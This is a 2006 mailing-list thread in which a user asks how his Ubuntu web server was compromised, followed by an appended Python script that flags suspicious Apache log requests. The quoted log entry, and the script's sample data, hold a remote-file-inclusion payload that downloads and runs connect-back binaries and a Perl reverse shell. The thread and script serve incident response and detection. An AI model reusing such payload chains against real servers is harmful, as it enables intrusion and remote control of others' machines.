Re: My home desktop was compromised, but how?
- From: "Michael J. Lynch" <mlynch@xxxxxxxx>
- Date: Tue, 28 Feb 2006 15:31:25 -0600
Carthik Sharma wrote:
Hi,
I run an apache, ssh server from my home computer. I have not
installed any php scripts whatsoever. All there are are text files,
and the odd html file.
Somebody seems to have hacked into my desktop/server. I find files in
the /tmp/ directory (like "agent.8213") which I cannot open; these are
setuid-ed -- how do I open these?
In my apache access logs, there are things like
"http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
That above is a valid url, and will take you to a script to deface
someone's php script etc, I suppose. Now, how did this malicious
hacker get in my computer?
(The full line is:
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)" )
How would I go about tracing how this incident happened?
Any server/security admins here that can help me with a little
patience? I really want to get to the root of this and find out why
whatever happened happened.
None of the passwords for the ssh accounts are dictionary words, in
fact all are combinations of letters, numbers and sometimes special
symbols.
I have done nothing special to modify apache, or the ssh daemon, in
fact, sshd listens on port 8888.
I could paste logs here, but they would be too long. For now, I have
stopped the apache and ssh servers.
Any help will be most welcome. My security bubble just burst :(
Carthik.
I'm not sure how you'd go about tracing down what happened, but my guess
is that it came in with a webpage. It clearly looks to be an attempt to
break into your machine as the *dc.txt* file it downloaded is a perl
script that looks to me like it attempts to connect an interactive shell
to a remote server of some sort. I believe this to be malicious because
the script redirects the shell history to /dev/null to hide what was
done.
You mention you are running a web server. One of the IP addresses
embedded in the long string is the address of a name server at a web
development company. Are you using such a service?
I don't know if any of this will help, but I hope so.
--
Michael J. Lynch
What if the hokey pokey IS what it's all about -- author unknown
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
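A defender-side way to start the tracing Carthik asks about, added here as an example that is not part of the thread: a small Python parser that walks Apache access-log lines, URL-decodes each query string and flags the two patterns visible in the quoted request (a parameter whose value is a remote URL, and a fetch-and-execute command chain). The log lines and the addresses in them are constructed for the example and are not the thread's real indicators.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed Apache combined-format lines (addresses from the RFC 5737 documentation
# ranges). The first reproduces the shape of the request quoted in the thread:
# a parameter pointing at a remote URL plus a URL-encoded download-and-run chain.
SAMPLE_LOG = """\
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://203.0.113.10/cmd.txt?&cmd=cd%20/tmp;wget%20198.51.100.7/cback;chmod%20744%20cback;./cback%20198.51.100.9%208081 HTTP/1.1" 404 303 "-" "Mozilla/4.0"
192.168.0.50 - - [26/Feb/2006:15:01:12 -0500] "GET /notes/todo.txt HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.0.51 - - [26/Feb/2006:15:03:40 -0500] "GET /index.php?page=http://203.0.113.10/shell.txt HTTP/1.1" 200 88 "-" "curl/7.15"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Tokens that, once the query is URL-decoded, indicate a fetch-and-execute chain.
SHELL_TOKENS = ("wget ", "curl ", "chmod ", "perl ", "./", ";")

def analyse_line(line):
    """Parse one access-log line and return its fields plus a list of findings."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_query = urlsplit(m["target"]).query
    findings = []
    # Split on '&' by hand so a literal ';' inside a value is not treated as a separator.
    for pair in raw_query.split("&"):
        key, _, value = pair.partition("=")
        if re.match(r"https?://", unquote(value), re.I):
            # A parameter whose value is a URL is the signature of a remote file inclusion attempt.
            findings.append(f"remote URL in parameter {unquote(key)!r}")
    decoded = unquote(raw_query)
    hits = [t.strip() for t in SHELL_TOKENS if t in decoded]
    if len(hits) >= 3:
        findings.append("shell command chain: " + ", ".join(hits))
    # Status matters for triage: 404 means the requested script was not present on
    # this server; a 2xx on a flagged request deserves forensic follow-up.
    return {"ip": m["ip"], "time": m["time"], "target": m["target"],
            "status": int(m["status"]), "findings": findings}

def flag_suspicious(log_text):
    """Return the analysed entries that carry at least one finding."""
    entries = (analyse_line(l) for l in log_text.splitlines() if l.strip())
    return [e for e in entries if e and e["findings"]]

if __name__ == "__main__":
    for e in flag_suspicious(SAMPLE_LOG):
        print(e["time"], e["ip"], e["status"], "; ".join(e["findings"]))
```

Running it over a real access log (for example `flag_suspicious(open("/var/log/apache2/access.log").read())`) lists the requests worth correlating with file timestamps in /tmp and /var/tmp.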